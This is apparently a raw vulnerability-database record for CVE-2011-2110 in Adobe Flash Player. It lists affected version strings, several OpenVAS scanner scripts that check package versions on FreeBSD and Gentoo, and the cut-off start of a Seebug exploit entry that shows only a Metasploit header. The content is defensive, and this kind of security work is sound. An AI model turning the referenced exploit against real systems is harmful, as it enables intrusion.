"cpe:2.3:a:adobe:flash_player:8.0.39.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.53.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.95.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.155.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.159.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.52.15:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.24.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.24.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.102.64:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.12.36:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.124.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:6.0.21.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.52.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.67.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.20.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.151.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.2.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.3.181.14:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.73.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.18d60:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.3.181.16:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.32.18:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.70.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.2.156.12:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.2.157.51:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.105.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.34.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.115.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.152.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.33.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.15.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.31.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.2.159.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.246.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.2.152.32:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.47.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.48.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.53.64:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.112.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.125.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.95.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.14.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.3.185.21:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.42.34:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.85.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.114.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.0.584:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.42.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.45.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.262.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.12.10:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.106.16:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.28.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.45.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.3.181.23:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.35.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.2.154.13:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.92.8:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.60.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.22.87:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.283.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.2.152.33:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:6.0.79:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.61.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.92.10:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.82.76:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.2.154.25:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.63:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:39:37", "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "cvss3": {}, "published": "2011-08-03T00:00:00", "type": "openvas", "title": "FreeBSD Ports: linux-flashplugin", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2110"], "modified": "2018-10-05T00:00:00", "id": "OPENVAS:136141256231069749", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231069749", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_linux-flashplugin15.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID 55a528e8-9787-11e0-b24a-001b2134ef46\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.69749\");\n script_version(\"$Revision: 11762 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-03 04:36:20 +0200 (Wed, 03 Aug 2011)\");\n script_cve_id(\"CVE-2011-2110\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: linux-flashplugin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following packages are affected:\n\n linux-flashplugin\n linux-f10-flashplugin\n\nCVE-2011-2110\nAdobe Flash Player before 10.3.181.26 on Windows, Mac OS X, Linux, and\nSolaris, and 10.3.185.23 and earlier on Android, allows remote\nattackers to execute arbitrary code or cause a denial of service\n(memory corruption) via unspecified vectors, as exploited in the wild\nin June 2011.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb11-18.html\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/55a528e8-9787-11e0-b24a-001b2134ef46.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"linux-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"9.0r289\")<=0) {\n txt += 'Package linux-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"linux-f10-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"10.3r181.26\")<0) {\n txt += 'Package linux-f10-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:13:37", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2011-08-03T00:00:00", "type": "openvas", "title": "FreeBSD Ports: linux-flashplugin", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2110"], "modified": "2017-02-25T00:00:00", "id": "OPENVAS:69749", "href": "http://plugins.openvas.org/nasl.php?oid=69749", "sourceData": "#\n#VID 55a528e8-9787-11e0-b24a-001b2134ef46\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 55a528e8-9787-11e0-b24a-001b2134ef46\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n linux-flashplugin\n linux-f10-flashplugin\n\nCVE-2011-2110\nAdobe Flash Player before 10.3.181.26 on Windows, Mac OS X, Linux, and\nSolaris, and 10.3.185.23 and earlier on Android, allows remote\nattackers to execute arbitrary code or cause a denial of service\n(memory corruption) via unspecified vectors, as exploited in the wild\nin June 2011.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.adobe.com/support/security/bulletins/apsb11-18.html\nhttp://www.vuxml.org/freebsd/55a528e8-9787-11e0-b24a-001b2134ef46.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(69749);\n script_version(\"$Revision: 5424 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-25 17:52:36 +0100 (Sat, 25 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-03 04:36:20 +0200 (Wed, 03 Aug 2011)\");\n script_cve_id(\"CVE-2011-2110\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: linux-flashplugin\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"linux-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"9.0r289\")<=0) {\n txt += 'Package linux-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-f10-flashplugin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"10.3r181.26\")<0) {\n txt += 'Package linux-f10-flashplugin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:57", "description": "The remote host is missing updates announced in\nadvisory GLSA 201110-11.", "cvss3": {}, "published": "2012-02-12T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201110-11 (Adobe Flash Player)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2428", "CVE-2011-2444", "CVE-2011-2416", "CVE-2011-0622", "CVE-2011-0626", "CVE-2011-0627", "CVE-2011-0619", "CVE-2011-2140", "CVE-2011-0623", "CVE-2011-0609", "CVE-2011-2424", "CVE-2011-0625", "CVE-2011-2134", "CVE-2011-2138", "CVE-2011-0628", "CVE-2011-2139", "CVE-2011-0572", "CVE-2011-0573", "CVE-2011-2429", "CVE-2011-0558", "CVE-2011-0608", "CVE-2011-0574", "CVE-2011-2425", "CVE-2011-2110", "CVE-2011-0560", "CVE-2011-0577", "CVE-2011-2414", "CVE-2011-0611", "CVE-2011-0618", "CVE-2011-0561", "CVE-2011-2130", "CVE-2011-2137", "CVE-2011-0578", "CVE-2011-2417", "CVE-2011-2135", "CVE-2011-0579", "CVE-2011-2125", "CVE-2011-0571", "CVE-2011-2426", "CVE-2011-0575", "CVE-2011-2107", "CVE-2011-0559", "CVE-2011-2136", "CVE-2011-0624", "CVE-2011-0607", "CVE-2011-2415", "CVE-2011-0589", "CVE-2011-0621", "CVE-2011-2427", "CVE-2011-2430", "CVE-2011-0620"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:136141256231070774", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070774", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201110_11.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70774\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-0558\", \"CVE-2011-0559\", \"CVE-2011-0560\", \"CVE-2011-0561\", \"CVE-2011-0571\", \"CVE-2011-0572\", \"CVE-2011-0573\", \"CVE-2011-0574\", \"CVE-2011-0575\", \"CVE-2011-0577\", \"CVE-2011-0578\", \"CVE-2011-0579\", \"CVE-2011-0589\", \"CVE-2011-0607\", \"CVE-2011-0608\", \"CVE-2011-0609\", \"CVE-2011-0611\", \"CVE-2011-0618\", \"CVE-2011-0619\", \"CVE-2011-0620\", \"CVE-2011-0621\", \"CVE-2011-0622\", \"CVE-2011-0623\", \"CVE-2011-0624\", \"CVE-2011-0625\", \"CVE-2011-0626\", \"CVE-2011-0627\", \"CVE-2011-0628\", \"CVE-2011-2107\", \"CVE-2011-2110\", \"CVE-2011-2135\", \"CVE-2011-2125\", \"CVE-2011-2130\", \"CVE-2011-2134\", \"CVE-2011-2136\", \"CVE-2011-2137\", \"CVE-2011-2138\", \"CVE-2011-2139\", \"CVE-2011-2140\", \"CVE-2011-2414\", \"CVE-2011-2415\", \"CVE-2011-2416\", \"CVE-2011-2417\", \"CVE-2011-2424\", \"CVE-2011-2425\", \"CVE-2011-2426\", \"CVE-2011-2427\", \"CVE-2011-2428\", \"CVE-2011-2429\", \"CVE-2011-2430\", \"CVE-2011-2444\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:39 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201110-11 (Adobe Flash Player)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities in Adobe Flash Player might allow remote\n attackers to execute arbitrary code or cause a Denial of Service.\");\n script_tag(name:\"solution\", value:\"All Adobe Flash Player users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-plugins/adobe-flash-10.3.183.10'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201110-11\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=354207\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=359019\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=363179\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=367031\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=370215\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=372899\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=378637\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=384017\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa11-01.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa11-02.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb11-02.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb11-12.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb11-13.html\");\n script_xref(name:\"URL\", value:\"https://www.adobe.com/support/security/bulletins/apsb11-21.html\");\n script_xref(name:\"URL\", value:\"https://www.adobe.com/support/security/bulletins/apsb11-26.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201110-11.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 10.3.183.10\"), vulnerable: make_list(\"lt 10.3.183.10\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:50:33", "description": "The remote host is missing updates announced in\nadvisory GLSA 201110-11.", "cvss3": {}, "published": "2012-02-12T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201110-11 (Adobe Flash Player)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2428", "CVE-2011-2444", "CVE-2011-2416", "CVE-2011-0622", "CVE-2011-0626", "CVE-2011-0627", "CVE-2011-0619", "CVE-2011-2140", "CVE-2011-0623", "CVE-2011-0609", "CVE-2011-2424", "CVE-2011-0625", "CVE-2011-2134", "CVE-2011-2138", "CVE-2011-0628", "CVE-2011-2139", "CVE-2011-0572", "CVE-2011-0573", "CVE-2011-2429", "CVE-2011-0558", "CVE-2011-0608", "CVE-2011-0574", "CVE-2011-2425", "CVE-2011-2110", "CVE-2011-0560", "CVE-2011-0577", "CVE-2011-2414", "CVE-2011-0611", "CVE-2011-0618", "CVE-2011-0561", "CVE-2011-2130", "CVE-2011-2137", "CVE-2011-0578", "CVE-2011-2417", "CVE-2011-2135", "CVE-2011-0579", "CVE-2011-2125", "CVE-2011-0571", "CVE-2011-2426", "CVE-2011-0575", "CVE-2011-2107", "CVE-2011-0559", "CVE-2011-2136", "CVE-2011-0624", "CVE-2011-0607", "CVE-2011-2415", "CVE-2011-0589", "CVE-2011-0621", "CVE-2011-2427", "CVE-2011-2430", "CVE-2011-0620"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:70774", "href": "http://plugins.openvas.org/nasl.php?oid=70774", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in Adobe Flash Player might allow remote\n attackers to execute arbitrary code or cause a Denial of Service.\";\ntag_solution = \"All Adobe Flash Player users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-plugins/adobe-flash-10.3.183.10'\n \n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201110-11\nhttp://bugs.gentoo.org/show_bug.cgi?id=354207\nhttp://bugs.gentoo.org/show_bug.cgi?id=359019\nhttp://bugs.gentoo.org/show_bug.cgi?id=363179\nhttp://bugs.gentoo.org/show_bug.cgi?id=367031\nhttp://bugs.gentoo.org/show_bug.cgi?id=370215\nhttp://bugs.gentoo.org/show_bug.cgi?id=372899\nhttp://bugs.gentoo.org/show_bug.cgi?id=378637\nhttp://bugs.gentoo.org/show_bug.cgi?id=384017\nhttp://www.adobe.com/support/security/advisories/apsa11-01.html\nhttp://www.adobe.com/support/security/advisories/apsa11-02.html\nhttp://www.adobe.com/support/security/bulletins/apsb11-02.html\nhttp://www.adobe.com/support/security/bulletins/apsb11-12.html\nhttp://www.adobe.com/support/security/bulletins/apsb11-13.html\nhttps://www.adobe.com/support/security/bulletins/apsb11-21.html\nhttps://www.adobe.com/support/security/bulletins/apsb11-26.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201110-11.\";\n\n \n \nif(description)\n{\n script_id(70774);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-0558\", \"CVE-2011-0559\", \"CVE-2011-0560\", \"CVE-2011-0561\", \"CVE-2011-0571\", \"CVE-2011-0572\", \"CVE-2011-0573\", \"CVE-2011-0574\", \"CVE-2011-0575\", \"CVE-2011-0577\", \"CVE-2011-0578\", \"CVE-2011-0579\", \"CVE-2011-0589\", \"CVE-2011-0607\", \"CVE-2011-0608\", \"CVE-2011-0609\", \"CVE-2011-0611\", \"CVE-2011-0618\", \"CVE-2011-0619\", \"CVE-2011-0620\", \"CVE-2011-0621\", \"CVE-2011-0622\", \"CVE-2011-0623\", \"CVE-2011-0624\", \"CVE-2011-0625\", \"CVE-2011-0626\", \"CVE-2011-0627\", \"CVE-2011-0628\", \"CVE-2011-2107\", \"CVE-2011-2110\", \"CVE-2011-2135\", \"CVE-2011-2125\", \"CVE-2011-2130\", \"CVE-2011-2134\", \"CVE-2011-2136\", \"CVE-2011-2137\", \"CVE-2011-2138\", \"CVE-2011-2139\", \"CVE-2011-2140\", \"CVE-2011-2414\", \"CVE-2011-2415\", \"CVE-2011-2416\", \"CVE-2011-2417\", \"CVE-2011-2424\", \"CVE-2011-2425\", \"CVE-2011-2426\", \"CVE-2011-2427\", \"CVE-2011-2428\", \"CVE-2011-2429\", \"CVE-2011-2430\", \"CVE-2011-2444\");\n script_version(\"$Revision: 6593 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:18:14 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:39 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201110-11 (Adobe Flash Player)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 10.3.183.10\"), vulnerable: make_list(\"lt 10.3.183.10\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T13:37:08", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Adobe Flash Player AVM Verification Logic Array Indexing Code Execution", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-2110"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-73235", "id": "SSV:73235", "sourceData": "\n ##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on 